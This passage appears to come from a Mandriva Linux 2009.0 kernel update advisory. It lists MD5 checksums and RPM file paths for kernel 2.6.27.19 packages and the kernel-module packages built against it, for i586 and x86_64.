 8dadf90ae5a81283449d2bbe823087be  2009.0/i586/iscsitarget-kernel-desktop586-latest-0.4.16-1.20090305.4mdv2009.0.i586.rpm
 eae908574de207cf4458057be7956fdd  2009.0/i586/iscsitarget-kernel-desktop-latest-0.4.16-1.20090305.4mdv2009.0.i586.rpm
 f5b7de5bd0e4800e55f80a4a1a92db45  2009.0/i586/iscsitarget-kernel-server-latest-0.4.16-1.20090305.4mdv2009.0.i586.rpm
 0ce632fc9d380e114fada972964c502d  2009.0/i586/kernel-2.6.27.19-1mnb-1-1mnb2.i586.rpm
 6b8e289ceb3972536a2c88ada8ccda90  2009.0/i586/kernel-desktop-2.6.27.19-1mnb-1-1mnb2.i586.rpm
 0a9b994300bdd16b21df73fa032c96ad  2009.0/i586/kernel-desktop586-2.6.27.19-1mnb-1-1mnb2.i586.rpm
 51792334b882becae8f343539a5e1ecc  2009.0/i586/kernel-desktop586-devel-2.6.27.19-1mnb-1-1mnb2.i586.rpm
 203f44f86c8fd1973a289865a59ef0a7  2009.0/i586/kernel-desktop586-devel-latest-2.6.27.19-1mnb2.i586.rpm
 cc34e8b5e87d0a87717083f01a16692c  2009.0/i586/kernel-desktop586-latest-2.6.27.19-1mnb2.i586.rpm
 76dd17772c1b177d44856a0d5716e694  2009.0/i586/kernel-desktop-devel-2.6.27.19-1mnb-1-1mnb2.i586.rpm
 acc605a833530b3ae488f3f00892cd64  2009.0/i586/kernel-desktop-devel-latest-2.6.27.19-1mnb2.i586.rpm
 34d5777839cf9b258e6b2026ab5da08d  2009.0/i586/kernel-desktop-latest-2.6.27.19-1mnb2.i586.rpm
 5835679f4bcaf386d26d61c629e08c57  2009.0/i586/kernel-doc-2.6.27.19-1mnb2.i586.rpm
 6dd8df32763137f3d0b91f3405a5b7e1  2009.0/i586/kernel-server-2.6.27.19-1mnb-1-1mnb2.i586.rpm
 42597987e49a2ed38ba2ea6ae96c916b  2009.0/i586/kernel-server-devel-2.6.27.19-1mnb-1-1mnb2.i586.rpm
 2cafd8d1761dab0aed0caae62fe470b3  2009.0/i586/kernel-server-devel-latest-2.6.27.19-1mnb2.i586.rpm
 3ddcc6a4e696e0a7033d259abdf6ff2b  2009.0/i586/kernel-server-latest-2.6.27.19-1mnb2.i586.rpm
 94176fb7c5b229b3c62f0600b1d52fe1  2009.0/i586/kernel-source-2.6.27.19-1mnb-1-1mnb2.i586.rpm
 f4cb8d91603fcb6f746582f196b612ab  2009.0/i586/kernel-source-latest-2.6.27.19-1mnb2.i586.rpm
 9def1b9894433e468010e8b1b24e92a5  2009.0/i586/kqemu-kernel-2.6.27.19-desktop-1mnb-1.4.0pre1-0.i586.rpm
 d50241909089fa30d6cb9a91b48c0816  2009.0/i586/kqemu-kernel-2.6.27.19-desktop586-1mnb-1.4.0pre1-0.i586.rpm
 df0f698d480de6d177750140997cbaad  2009.0/i586/kqemu-kernel-2.6.27.19-server-1mnb-1.4.0pre1-0.i586.rpm
 9be1b90adfb875259ec590ced18cff2c  2009.0/i586/kqemu-kernel-desktop586-latest-1.4.0pre1-1.20090305.0.i586.rpm
 09f82edb6d801f7e1f198e410af911d5  2009.0/i586/kqemu-kernel-desktop-latest-1.4.0pre1-1.20090305.0.i586.rpm
 032e27a171f1e9332171c390377f0c4a  2009.0/i586/kqemu-kernel-server-latest-1.4.0pre1-1.20090305.0.i586.rpm
 16ee99cb888c288489c625394d00063a  2009.0/i586/lirc-kernel-2.6.27.19-desktop-1mnb-0.8.3-4.1mdv2009.0.i586.rpm
 041176aaeabff23175d56872b93d3484  2009.0/i586/lirc-kernel-2.6.27.19-desktop586-1mnb-0.8.3-4.1mdv2009.0.i586.rpm
 9513568cac97c26c488c570556126a39  2009.0/i586/lirc-kernel-2.6.27.19-server-1mnb-0.8.3-4.1mdv2009.0.i586.rpm
 2503fe78bf9b733f20457619dddfa1fb  2009.0/i586/lirc-kernel-desktop586-latest-0.8.3-1.20090305.4.1mdv2009.0.i586.rpm
 7222d26034fd3480941309f89e0b8f97  2009.0/i586/lirc-kernel-desktop-latest-0.8.3-1.20090305.4.1mdv2009.0.i586.rpm
 069e2b02020d1d066fd41fc0d786c5bb  2009.0/i586/lirc-kernel-server-latest-0.8.3-1.20090305.4.1mdv2009.0.i586.rpm
 bcdec52d839f3f301ca186cee7c5251a  2009.0/i586/lzma-kernel-2.6.27.19-desktop-1mnb-4.43-24mdv2009.0.i586.rpm
 624410092a36c6e8d5da31fa25f180de  2009.0/i586/lzma-kernel-2.6.27.19-desktop586-1mnb-4.43-24mdv2009.0.i586.rpm
 c0dcc69c679fd7e71585e1ad47e49296  2009.0/i586/lzma-kernel-2.6.27.19-server-1mnb-4.43-24mdv2009.0.i586.rpm
 24dccc6927984e3cc5226ea7ef0e4c6e  2009.0/i586/lzma-kernel-desktop586-latest-4.43-1.20090305.24mdv2009.0.i586.rpm
 75e7e00da7b6d2de307dc7ba54b8496e  2009.0/i586/lzma-kernel-desktop-latest-4.43-1.20090305.24mdv2009.0.i586.rpm
 833ab6a7e7d3698bf97e510ed2559151  2009.0/i586/lzma-kernel-server-latest-4.43-1.20090305.24mdv2009.0.i586.rpm
 a225f322f51b2c66553a3d20aa9b84d7  2009.0/i586/madwifi-kernel-2.6.27.19-desktop-1mnb-0.9.4-3.r3835mdv2009.0.i586.rpm
 8757bc3b6c02469827cd3fc4d4ee434a  2009.0/i586/madwifi-kernel-2.6.27.19-desktop586-1mnb-0.9.4-3.r3835mdv2009.0.i586.rpm
 c261089e440f598c75576db44c381bf3  2009.0/i586/madwifi-kernel-2.6.27.19-server-1mnb-0.9.4-3.r3835mdv2009.0.i586.rpm
 6774505946633000fdee6b46b284f966  2009.0/i586/madwifi-kernel-desktop586-latest-0.9.4-1.20090305.3.r3835mdv2009.0.i586.rpm
 650b393616d0016978b79280504bb850  2009.0/i586/madwifi-kernel-desktop-latest-0.9.4-1.20090305.3.r3835mdv2009.0.i586.rpm
 2647605d19cae74d65dcf871bea24a29  2009.0/i586/madwifi-kernel-server-latest-0.9.4-1.20090305.3.r3835mdv2009.0.i586.rpm
 164bff5c827a6c9035079de57c23ad95  2009.0/i586/nvidia173-kernel-2.6.27.19-desktop-1mnb-173.14.12-4mdv2009.0.i586.rpm
 6e0bdeebbe9dc2cb43ece0d417aa3717  2009.0/i586/nvidia173-kernel-2.6.27.19-desktop586-1mnb-173.14.12-4mdv2009.0.i586.rpm
 db8660249c42d373c74a4d184ae8503c  2009.0/i586/nvidia173-kernel-desktop586-latest-173.14.12-1.20090305.4mdv2009.0.i586.rpm
 6379084d1c176074cbb03d63da74a838  2009.0/i586/nvidia173-kernel-desktop-latest-173.14.12-1.20090305.4mdv2009.0.i586.rpm
 81cb1ae3ca9eb1936a83875fbadf2d8b  2009.0/i586/nvidia71xx-kernel-2.6.27.19-desktop-1mnb-71.86.06-5mdv2009.0.i586.rpm
 511b3bfac9f87e5a2d019b265eb0dbca  2009.0/i586/nvidia71xx-kernel-2.6.27.19-desktop586-1mnb-71.86.06-5mdv2009.0.i586.rpm
 d94d07e08ccd73ce799dcd4a552be793  2009.0/i586/nvidia71xx-kernel-2.6.27.19-server-1mnb-71.86.06-5mdv2009.0.i586.rpm
 1a7c007d81b7f519f879aa2e8d01e338  2009.0/i586/nvidia71xx-kernel-desktop586-latest-71.86.06-1.20090305.5mdv2009.0.i586.rpm
 2af0764dc27da74ab0c371cb0ecdfd83  2009.0/i586/nvidia71xx-kernel-desktop-latest-71.86.06-1.20090305.5mdv2009.0.i586.rpm
 9694789bcb36b812d47534e0711b1a45  2009.0/i586/nvidia71xx-kernel-server-latest-71.86.06-1.20090305.5mdv2009.0.i586.rpm
 cf03bc258ad23472f420173148558910  2009.0/i586/nvidia96xx-kernel-2.6.27.19-desktop-1mnb-96.43.07-5mdv2009.0.i586.rpm
 0b7d715d245cdf944676f6122af8ebd6  2009.0/i586/nvidia96xx-kernel-2.6.27.19-desktop586-1mnb-96.43.07-5mdv2009.0.i586.rpm
 b8196eff47518fe28a2e774f51b88532  2009.0/i586/nvidia96xx-kernel-2.6.27.19-server-1mnb-96.43.07-5mdv2009.0.i586.rpm
 949c8f30e7008988a867eedfb559b4fb  2009.0/i586/nvidia96xx-kernel-desktop586-latest-96.43.07-1.20090305.5mdv2009.0.i586.rpm
 a646243e4b262a6f7fab9dc5fa915e89  2009.0/i586/nvidia96xx-kernel-desktop-latest-96.43.07-1.20090305.5mdv2009.0.i586.rpm
 a05ffb2a8f5371bf6d30358aab05698c  2009.0/i586/nvidia96xx-kernel-server-latest-96.43.07-1.20090305.5mdv2009.0.i586.rpm
 8906ac0db00332a6700c38f8e8125cd0  2009.0/i586/nvidia-current-kernel-2.6.27.19-desktop-1mnb-177.70-2.3mdv2009.0.i586.rpm
 842c7f19ef358c788e58a72ffe23071b  2009.0/i586/nvidia-current-kernel-2.6.27.19-desktop586-1mnb-177.70-2.3mdv2009.0.i586.rpm
 4c27d98640d507934d58fa491575daa8  2009.0/i586/nvidia-current-kernel-2.6.27.19-server-1mnb-177.70-2.3mdv2009.0.i586.rpm
 2696288a3309bfae68cbb5b9ee9363e0  2009.0/i586/nvidia-current-kernel-desktop586-latest-177.70-1.20090305.2.3mdv2009.0.i586.rpm
 3c1d28fb5632251983cacaec44578d86  2009.0/i586/nvidia-current-kernel-desktop-latest-177.70-1.20090305.2.3mdv2009.0.i586.rpm
 6cf33c3312fd3256dcb14761921eb4ab  2009.0/i586/nvidia-current-kernel-server-latest-177.70-1.20090305.2.3mdv2009.0.i586.rpm
 eacb8ea778af3ff78ef58942eab23105  2009.0/i586/omfs-kernel-2.6.27.19-desktop-1mnb-0.8.0-1mdv2009.0.i586.rpm
 107264ee670882f9642532d05029e229  2009.0/i586/omfs-kernel-2.6.27.19-desktop586-1mnb-0.8.0-1mdv2009.0.i586.rpm
 b926add1895fbcda6ba32323f8e88718  2009.0/i586/omfs-kernel-2.6.27.19-server-1mnb-0.8.0-1mdv2009.0.i586.rpm
 9fbd459e57d8eeeafada18852830058a  2009.0/i586/omfs-kernel-desktop586-latest-0.8.0-1.20090305.1mdv2009.0.i586.rpm
 325424f7a578647dfea9897dd4dccd40  2009.0/i586/omfs-kernel-desktop-latest-0.8.0-1.20090305.1mdv2009.0.i586.rpm
 8da55e50cb708523e212ce2ede9182c4  2009.0/i586/omfs-kernel-server-latest-0.8.0-1.20090305.1mdv2009.0.i586.rpm
 7b60f82b26ca77ca995c19db818135cc  2009.0/i586/omnibook-kernel-2.6.27.19-desktop-1mnb-20080513-0.274.1mdv2009.0.i586.rpm
 5dead3be02cc6baf52f020b97c232a75  2009.0/i586/omnibook-kernel-2.6.27.19-desktop586-1mnb-20080513-0.274.1mdv2009.0.i586.rpm
 8c097aac6047b51e87889e579f9b891f  2009.0/i586/omnibook-kernel-2.6.27.19-server-1mnb-20080513-0.274.1mdv2009.0.i586.rpm
 48b63f06c6142efd0843d9477b60a033  2009.0/i586/omnibook-kernel-desktop586-latest-20080513-1.20090305.0.274.1mdv2009.0.i586.rpm
 6529176b08f4dfd65fc94cc32367c54c  2009.0/i586/omnibook-kernel-desktop-latest-20080513-1.20090305.0.274.1mdv2009.0.i586.rpm
 862f88d7d82bef088613231baf0bf113  2009.0/i586/omnibook-kernel-server-latest-20080513-1.20090305.0.274.1mdv2009.0.i586.rpm
 2b78f1db33766589890f955b3c3e8d90  2009.0/i586/opencbm-kernel-2.6.27.19-desktop-1mnb-0.4.2a-1mdv2008.1.i586.rpm
 d6eb3627145b554742753487a699eb71  2009.0/i586/opencbm-kernel-2.6.27.19-desktop586-1mnb-0.4.2a-1mdv2008.1.i586.rpm
 5fef6dba8d3e420e11ca46b89299eb96  2009.0/i586/opencbm-kernel-2.6.27.19-server-1mnb-0.4.2a-1mdv2008.1.i586.rpm
 eb2cf46481c7d3c5c506dd48f73d13a3  2009.0/i586/opencbm-kernel-desktop586-latest-0.4.2a-1.20090305.1mdv2008.1.i586.rpm
 802accbcaf5dbfa054624a825462f4c3  2009.0/i586/opencbm-kernel-desktop-latest-0.4.2a-1.20090305.1mdv2008.1.i586.rpm
 e8511deddd2814268b87b11e569cb1af  2009.0/i586/opencbm-kernel-server-latest-0.4.2a-1.20090305.1mdv2008.1.i586.rpm
 9f2b095f9ea7fba33c9a92449eceae81  2009.0/i586/ov51x-jpeg-kernel-2.6.27.19-desktop-1mnb-1.5.9-2mdv2009.0.i586.rpm
 f1ddfb49495fd5829ecf762a4592ee06  2009.0/i586/ov51x-jpeg-kernel-2.6.27.19-desktop586-1mnb-1.5.9-2mdv2009.0.i586.rpm
 c31a76dc6c4720037d7f0a92e1e157aa  2009.0/i586/ov51x-jpeg-kernel-2.6.27.19-server-1mnb-1.5.9-2mdv2009.0.i586.rpm
 f24ee14c676a1cd20eea56db6ff9cea7  2009.0/i586/ov51x-jpeg-kernel-desktop586-latest-1.5.9-1.20090305.2mdv2009.0.i586.rpm
 10f4aa4428b68e71a8bd4d5555f78454  2009.0/i586/ov51x-jpeg-kernel-desktop-latest-1.5.9-1.20090305.2mdv2009.0.i586.rpm
 f6c26ba890714e3a9ded62420e130c5a  2009.0/i586/ov51x-jpeg-kernel-server-latest-1.5.9-1.20090305.2mdv2009.0.i586.rpm
 0f67c9befc9efd569cbdd2ccbfd85d93  2009.0/i586/qc-usb-kernel-2.6.27.19-desktop-1mnb-0.6.6-6mdv2009.0.i586.rpm
 a81c832fddc48d688213bc82cd9380df  2009.0/i586/qc-usb-kernel-2.6.27.19-desktop586-1mnb-0.6.6-6mdv2009.0.i586.rpm
 c8b8bbb68fdfb8d62a4f959337b69060  2009.0/i586/qc-usb-kernel-2.6.27.19-server-1mnb-0.6.6-6mdv2009.0.i586.rpm
 b1dd4c309c852d61432f608684417174  2009.0/i586/qc-usb-kernel-desktop586-latest-0.6.6-1.20090305.6mdv2009.0.i586.rpm
 45f7b32bc8ca152e3591b370453903f9  2009.0/i586/qc-usb-kernel-desktop-latest-0.6.6-1.20090305.6mdv2009.0.i586.rpm
 63ab7b8e15acfafec986fc3329fd4ace  2009.0/i586/qc-usb-kernel-server-latest-0.6.6-1.20090305.6mdv2009.0.i586.rpm
 8857d93572e771cf61f74b3e7314847f  2009.0/i586/rt2860-kernel-2.6.27.19-desktop-1mnb-1.7.0.0-2mdv2009.0.i586.rpm
 dc1b1f29dcc9c4dbe9fd6eb7784f18e1  2009.0/i586/rt2860-kernel-2.6.27.19-desktop586-1mnb-1.7.0.0-2mdv2009.0.i586.rpm
 31ab07fe76c636721d98650788c6636a  2009.0/i586/rt2860-kernel-2.6.27.19-server-1mnb-1.7.0.0-2mdv2009.0.i586.rpm
 4cdf540e3c9fb2001e369cc6353c56e6  2009.0/i586/rt2860-kernel-desktop586-latest-1.7.0.0-1.20090305.2mdv2009.0.i586.rpm
 ebc20fa97dcb178adcc7a6da546c0f63  2009.0/i586/rt2860-kernel-desktop-latest-1.7.0.0-1.20090305.2mdv2009.0.i586.rpm
 ff9ea4777a7d4052ad2da48d71538220  2009.0/i586/rt2860-kernel-server-latest-1.7.0.0-1.20090305.2mdv2009.0.i586.rpm
 9734b47a2dec3510e7851d972da5ee88  2009.0/i586/rt2870-kernel-2.6.27.19-desktop-1mnb-1.3.1.0-2mdv2009.0.i586.rpm
 e588805d6198a9c1eac96d09b317fd2b  2009.0/i586/rt2870-kernel-2.6.27.19-desktop586-1mnb-1.3.1.0-2mdv2009.0.i586.rpm
 167cddba9d97c655184c7d79b9383ca4  2009.0/i586/rt2870-kernel-2.6.27.19-server-1mnb-1.3.1.0-2mdv2009.0.i586.rpm
 f5bfe516a51433cfaab9d766ae209430  2009.0/i586/rt2870-kernel-desktop586-latest-1.3.1.0-1.20090305.2mdv2009.0.i586.rpm
 a7785d9be7e07cc9e5d2f4445bffd822  2009.0/i586/rt2870-kernel-desktop-latest-1.3.1.0-1.20090305.2mdv2009.0.i586.rpm
 a962d5a5ddb0d5abfbe1fe3e57fb48b1  2009.0/i586/rt2870-kernel-server-latest-1.3.1.0-1.20090305.2mdv2009.0.i586.rpm
 b1a877d9e8d00b70b59bb80c9680acbe  2009.0/i586/rtl8187se-kernel-2.6.27.19-desktop-1mnb-1016.20080716-1.1mdv2009.0.i586.rpm
 c048e5315987f26780616cf94c0f4822  2009.0/i586/rtl8187se-kernel-2.6.27.19-desktop586-1mnb-1016.20080716-1.1mdv2009.0.i586.rpm
 f6eff0adb94357152e3a0852d5379ad3  2009.0/i586/rtl8187se-kernel-2.6.27.19-server-1mnb-1016.20080716-1.1mdv2009.0.i586.rpm
 a32f1a756d4de813795e599e97d1c2d0  2009.0/i586/rtl8187se-kernel-desktop586-latest-1016.20080716-1.20090305.1.1mdv2009.0.i586.rpm
 2ff2126b46e5f25885d405fa5127111e  2009.0/i586/rtl8187se-kernel-desktop-latest-1016.20080716-1.20090305.1.1mdv2009.0.i586.rpm
 9662cf974be2c1a44c37b6190f3dc5fa  2009.0/i586/rtl8187se-kernel-server-latest-1016.20080716-1.20090305.1.1mdv2009.0.i586.rpm
 f23c60919bb5868d827154d0d124b24b  2009.0/i586/slmodem-kernel-2.6.27.19-desktop-1mnb-2.9.11-0.20080817.1mdv2009.0.i586.rpm
 f174511adbf4e7d4a28fa93d8bf445df  2009.0/i586/slmodem-kernel-2.6.27.19-desktop586-1mnb-2.9.11-0.20080817.1mdv2009.0.i586.rpm
 98e226637b496a13a5cc61aa1c32825e  2009.0/i586/slmodem-kernel-2.6.27.19-server-1mnb-2.9.11-0.20080817.1mdv2009.0.i586.rpm
 2453d695bf412200f05105d19c83295d  2009.0/i586/slmodem-kernel-desktop586-latest-2.9.11-1.20090305.0.20080817.1mdv2009.0.i586.rpm
 81ba97857beb20d566b38b4eb70395f3  2009.0/i586/slmodem-kernel-desktop-latest-2.9.11-1.20090305.0.20080817.1mdv2009.0.i586.rpm
 fde7a43ea7bec1b5bd0ed4ee2d44649a  2009.0/i586/slmodem-kernel-server-latest-2.9.11-1.20090305.0.20080817.1mdv2009.0.i586.rpm
 052bec59e98e44029488c57b69fe60ff  2009.0/i586/squashfs-lzma-kernel-2.6.27.19-desktop-1mnb-3.3-5mdv2009.0.i586.rpm
 4c1fa95cc898ba83f6baf0d620edd03b  2009.0/i586/squashfs-lzma-kernel-2.6.27.19-desktop586-1mnb-3.3-5mdv2009.0.i586.rpm
 c2fb9bcc23ff1f6f5cc80f141bfcc5b5  2009.0/i586/squashfs-lzma-kernel-2.6.27.19-server-1mnb-3.3-5mdv2009.0.i586.rpm
 ffaee2e16f52219fd01aeac53a7b9a28  2009.0/i586/squashfs-lzma-kernel-desktop586-latest-3.3-1.20090305.5mdv2009.0.i586.rpm
 875ef4776e87aacc60311cd6348c8e70  2009.0/i586/squashfs-lzma-kernel-desktop-latest-3.3-1.20090305.5mdv2009.0.i586.rpm
 7be80c25c340e40ab5806cbb7e2b1c1b  2009.0/i586/squashfs-lzma-kernel-server-latest-3.3-1.20090305.5mdv2009.0.i586.rpm
 67d811b775b455cca7646ab96fe19feb  2009.0/i586/tp_smapi-kernel-2.6.27.19-desktop-1mnb-0.37-2mdv2009.0.i586.rpm
 dc86190987f5d63dee6a09f6b575cc03  2009.0/i586/tp_smapi-kernel-2.6.27.19-desktop586-1mnb-0.37-2mdv2009.0.i586.rpm
 b5541df9b49246ab3a543954776b0c45  2009.0/i586/tp_smapi-kernel-2.6.27.19-server-1mnb-0.37-2mdv2009.0.i586.rpm
 08c55424da589b16df3d121444567561  2009.0/i586/tp_smapi-kernel-desktop586-latest-0.37-1.20090305.2mdv2009.0.i586.rpm
 42b2b4fcb45a531cf9ac98415df13a75  2009.0/i586/tp_smapi-kernel-desktop-latest-0.37-1.20090305.2mdv2009.0.i586.rpm
 25cc601d14b45a48684a637293bce938  2009.0/i586/tp_smapi-kernel-server-latest-0.37-1.20090305.2mdv2009.0.i586.rpm
 17fef41a38010861a901930cf4ed8789  2009.0/i586/vboxadd-kernel-2.6.27.19-desktop-1mnb-2.0.2-2.1mdv2009.0.i586.rpm
 5b4a7708d4886312877f1221ff8b8e6a  2009.0/i586/vboxadd-kernel-2.6.27.19-desktop586-1mnb-2.0.2-2.1mdv2009.0.i586.rpm
 fbb5b5ffd33de16d821f38f860aeaee3  2009.0/i586/vboxadd-kernel-2.6.27.19-server-1mnb-2.0.2-2.1mdv2009.0.i586.rpm
 a74d862b1eab86f4e91750b6a6d17d36  2009.0/i586/vboxadd-kernel-desktop586-latest-2.0.2-1.20090305.2.1mdv2009.0.i586.rpm
 05cb9e7b2412e33b527a9d8349801d39  2009.0/i586/vboxadd-kernel-desktop-latest-2.0.2-1.20090305.2.1mdv2009.0.i586.rpm
 b0b7f400718e23692fad06655ead2d5b  2009.0/i586/vboxadd-kernel-server-latest-2.0.2-1.20090305.2.1mdv2009.0.i586.rpm
 5f4036eea31ec44aee2c39ce9fd1e019  2009.0/i586/vboxvfs-kernel-2.6.27.19-desktop-1mnb-2.0.2-2.1mdv2009.0.i586.rpm
 402e81c8f408dd6cf76069163e5005b5  2009.0/i586/vboxvfs-kernel-2.6.27.19-desktop586-1mnb-2.0.2-2.1mdv2009.0.i586.rpm
 d46a98e24e9eade0625ac0ddc824b21e  2009.0/i586/vboxvfs-kernel-2.6.27.19-server-1mnb-2.0.2-2.1mdv2009.0.i586.rpm
 f3cb5d805d8a5787e2ca57f28eb52529  2009.0/i586/vboxvfs-kernel-desktop586-latest-2.0.2-1.20090305.2.1mdv2009.0.i586.rpm
 e2b5b411390ed737e4fcebbc364b5a4f  2009.0/i586/vboxvfs-kernel-desktop-latest-2.0.2-1.20090305.2.1mdv2009.0.i586.rpm
 cbd8cd9d0405eac1939629533ef8fe02  2009.0/i586/vboxvfs-kernel-server-latest-2.0.2-1.20090305.2.1mdv2009.0.i586.rpm
 34d17ced32a45f67e7f85185c3b2a7bb  2009.0/i586/vhba-kernel-2.6.27.19-desktop-1mnb-1.0.0-1.svn304.1mdv2009.0.i586.rpm
 8cd923691e9c04811a1d2eafa32fa091  2009.0/i586/vhba-kernel-2.6.27.19-desktop586-1mnb-1.0.0-1.svn304.1mdv2009.0.i586.rpm
 d6b8d565712b513d4e31ce08411c3cc9  2009.0/i586/vhba-kernel-2.6.27.19-server-1mnb-1.0.0-1.svn304.1mdv2009.0.i586.rpm
 fb6c3b61defffb731bd8143e8ea56efe  2009.0/i586/vhba-kernel-desktop586-latest-1.0.0-1.20090305.1.svn304.1mdv2009.0.i586.rpm
 b2505d5bb99c5889a12e2e089e549669  2009.0/i586/vhba-kernel-desktop-latest-1.0.0-1.20090305.1.svn304.1mdv2009.0.i586.rpm
 1207949eafe27831fdd8695ea118ddfe  2009.0/i586/vhba-kernel-server-latest-1.0.0-1.20090305.1.svn304.1mdv2009.0.i586.rpm
 13af97bb172b5647d388dea63f7afdeb  2009.0/i586/virtualbox-kernel-2.6.27.19-desktop-1mnb-2.0.2-2.1mdv2009.0.i586.rpm
 242b990d08b0795552e3ded15091ca9a  2009.0/i586/virtualbox-kernel-2.6.27.19-desktop586-1mnb-2.0.2-2.1mdv2009.0.i586.rpm
 4498313356e483be80ae72ba8a06f4aa  2009.0/i586/virtualbox-kernel-2.6.27.19-server-1mnb-2.0.2-2.1mdv2009.0.i586.rpm
 6572f7084ab8fa7ce55dc23137e539eb  2009.0/i586/virtualbox-kernel-desktop586-latest-2.0.2-1.20090305.2.1mdv2009.0.i586.rpm
 4b5c0c2b8dc899fb686021271ba6361a  2009.0/i586/virtualbox-kernel-desktop-latest-2.0.2-1.20090305.2.1mdv2009.0.i586.rpm
 2d3a307b25fe2cef9cd6ea1a459c29d2  2009.0/i586/virtualbox-kernel-server-latest-2.0.2-1.20090305.2.1mdv2009.0.i586.rpm
 1e54fb41c4c6723108369e9b34233038  2009.0/i586/vpnclient-kernel-2.6.27.19-desktop-1mnb-4.8.01.0640-3mdv2009.0.i586.rpm
 fe82daedce3d043ad3076c760a6b45e7  2009.0/i586/vpnclient-kernel-2.6.27.19-desktop586-1mnb-4.8.01.0640-3mdv2009.0.i586.rpm
 872dd1a1024376324b12de05b84b2dfd  2009.0/i586/vpnclient-kernel-2.6.27.19-server-1mnb-4.8.01.0640-3mdv2009.0.i586.rpm
 98ec90796498ee16c43c2e16d5f52640  2009.0/i586/vpnclient-kernel-desktop586-latest-4.8.01.0640-1.20090305.3mdv2009.0.i586.rpm
 6fa03085ae3c3e7b7472131f4f6b7254  2009.0/i586/vpnclient-kernel-desktop-latest-4.8.01.0640-1.20090305.3mdv2009.0.i586.rpm
 828088821547485bfb7cfc52e05763a3  2009.0/i586/vpnclient-kernel-server-latest-4.8.01.0640-1.20090305.3mdv2009.0.i586.rpm 
 9449cc7da776f4b2a5f72e386f555cbc  2009.0/SRPMS/kernel-2.6.27.19-1mnb2.src.rpm

 Mandriva Linux 2009.0/X86_64:
 894bbd22254ab616321d49d1aea076fa  2009.0/x86_64/alsa_raoppcm-kernel-2.6.27.19-desktop-1mnb-0.5.1-2mdv2008.0.x86_64.rpm
 74930ce0211eeda384c808be63ec5f79  2009.0/x86_64/alsa_raoppcm-kernel-2.6.27.19-server-1mnb-0.5.1-2mdv2008.0.x86_64.rpm
 7e2a1ebf562b73c04ce4757b412c56a8  2009.0/x86_64/alsa_raoppcm-kernel-desktop-latest-0.5.1-1.20090305.2mdv2008.0.x86_64.rpm
 3b475280762025c1a3574fbea1b59cb4  2009.0/x86_64/alsa_raoppcm-kernel-server-latest-0.5.1-1.20090305.2mdv2008.0.x86_64.rpm
 9f4560d8f09245216d601f9e8c373e4c  2009.0/x86_64/drm-experimental-kernel-2.6.27.19-desktop-1mnb-2.3.0-2.20080912.1mdv2009.0.x86_64.rpm
 5b0be7a7161201a2532b1a63aedc1411  2009.0/x86_64/drm-experimental-kernel-2.6.27.19-server-1mnb-2.3.0-2.20080912.1mdv2009.0.x86_64.rpm
 089ce1949d44a3a0e8bb8b55b1325b70  2009.0/x86_64/drm-experimental-kernel-desktop-latest-2.3.0-1.20090305.2.20080912.1mdv2009.0.x86_64.rpm
 63e5a0ecff019d45bbc17b60501b386e  2009.0/x86_64/drm-experimental-kernel-server-latest-2.3.0-1.20090305.2.20080912.1mdv2009.0.x86_64.rpm
 2b30cf7a48df5d4653a7cdde920e791d  2009.0/x86_64/et131x-kernel-2.6.27.19-desktop-1mnb-1.2.3-7mdv2009.0.x86_64.rpm
 189da79c374205e35dc20ec0ba3e42c9  2009.0/x86_64/et131x-kernel-2.6.27.19-server-1mnb-1.2.3-7mdv2009.0.x86_64.rpm
 9a35b20eea39c1d4fb984b925a73815e  2009.0/x86_64/et131x-kernel-desktop-latest-1.2.3-1.20090305.7mdv2009.0.x86_64.rpm
 0ffb9fa0e7065d3819fc2ea208f51612  2009.0/x86_64/et131x-kernel-server-latest-1.2.3-1.20090305.7mdv2009.0.x86_64.rpm
 285dfb40bf341cfab75263a0a7fcfe25  2009.0/x86_64/fglrx-kernel-2.6.27.19-desktop-1mnb-8.522-3mdv2009.0.x86_64.rpm
 f7c930d8bfe73d803f8853cfa8fa6664  2009.0/x86_64/fglrx-kernel-2.6.27.19-server-1mnb-8.522-3mdv2009.0.x86_64.rpm
 508fbdc9a8d33fc2a70537d2ee108265  2009.0/x86_64/fglrx-kernel-desktop-latest-8.522-1.20090305.3mdv2009.0.x86_64.rpm
 008d986d5587823198f705634f699838  2009.0/x86_64/fglrx-kernel-server-latest-8.522-1.20090305.3mdv2009.0.x86_64.rpm
 d0a0c02367d6725bd1c1afef0ace5803  2009.0/x86_64/gnbd-kernel-2.6.27.19-desktop-1mnb-2.03.07-2mdv2009.0.x86_64.rpm
 5f914760f133a45f6cb78462b51ec15c  2009.0/x86_64/gnbd-kernel-2.6.27.19-server-1mnb-2.03.07-2mdv2009.0.x86_64.rpm
 d47d5be77fc4e13bab81f9bfa7916674  2009.0/x86_64/gnbd-kernel-desktop-latest-2.03.07-1.20090305.2mdv2009.0.x86_64.rpm
 eb5a4d2cd6c6301b22cd30d93bf1d070  2009.0/x86_64/gnbd-kernel-server-latest-2.03.07-1.20090305.2mdv2009.0.x86_64.rpm
 95b0f2a016033c7a5b6984fd1af52d6c  2009.0/x86_64/hsfmodem-kernel-2.6.27.19-desktop-1mnb-7.68.00.13-1.2mdv2009.0.x86_64.rpm
 7cf675dcb0d69515989eae1e0227925b  2009.0/x86_64/hsfmodem-kernel-2.6.27.19-server-1mnb-7.68.00.13-1.2mdv2009.0.x86_64.rpm
 29f6fca5288e06cc07aba81238f48ec7  2009.0/x86_64/hsfmodem-kernel-desktop-latest-7.68.00.13-1.20090305.1.2mdv2009.0.x86_64.rpm
 dc629efcad5b7d2985afe6899760ffb4  2009.0/x86_64/hsfmodem-kernel-server-latest-7.68.00.13-1.20090305.1.2mdv2009.0.x86_64.rpm
 fe4f52ad8d1f019a3f2894f0afb16a37  2009.0/x86_64/hso-kernel-2.6.27.19-desktop-1mnb-1.2-2mdv2009.0.x86_64.rpm
 6b1a658ea3ef22338123139614188e92  2009.0/x86_64/hso-kernel-2.6.27.19-server-1mnb-1.2-2mdv2009.0.x86_64.rpm
 6e370faf7c7a13c5591bd2b640331b3d  2009.0/x86_64/hso-kernel-desktop-latest-1.2-1.20090305.2mdv2009.0.x86_64.rpm
 35609a3f616874106433e0dd1bc11d2a  2009.0/x86_64/hso-kernel-server-latest-1.2-1.20090305.2mdv2009.0.x86_64.rpm
 dcc4366590864be6f4f7d7c93267f97a  2009.0/x86_64/iscsitarget-kernel-2.6.27.19-desktop-1mnb-0.4.16-4mdv2009.0.x86_64.rpm
 3c8202d91d4a3f80d0975bc22c446a47  2009.0/x86_64/iscsitarget-kernel-2.6.27.19-server-1mnb-0.4.16-4mdv2009.0.x86_64.rpm
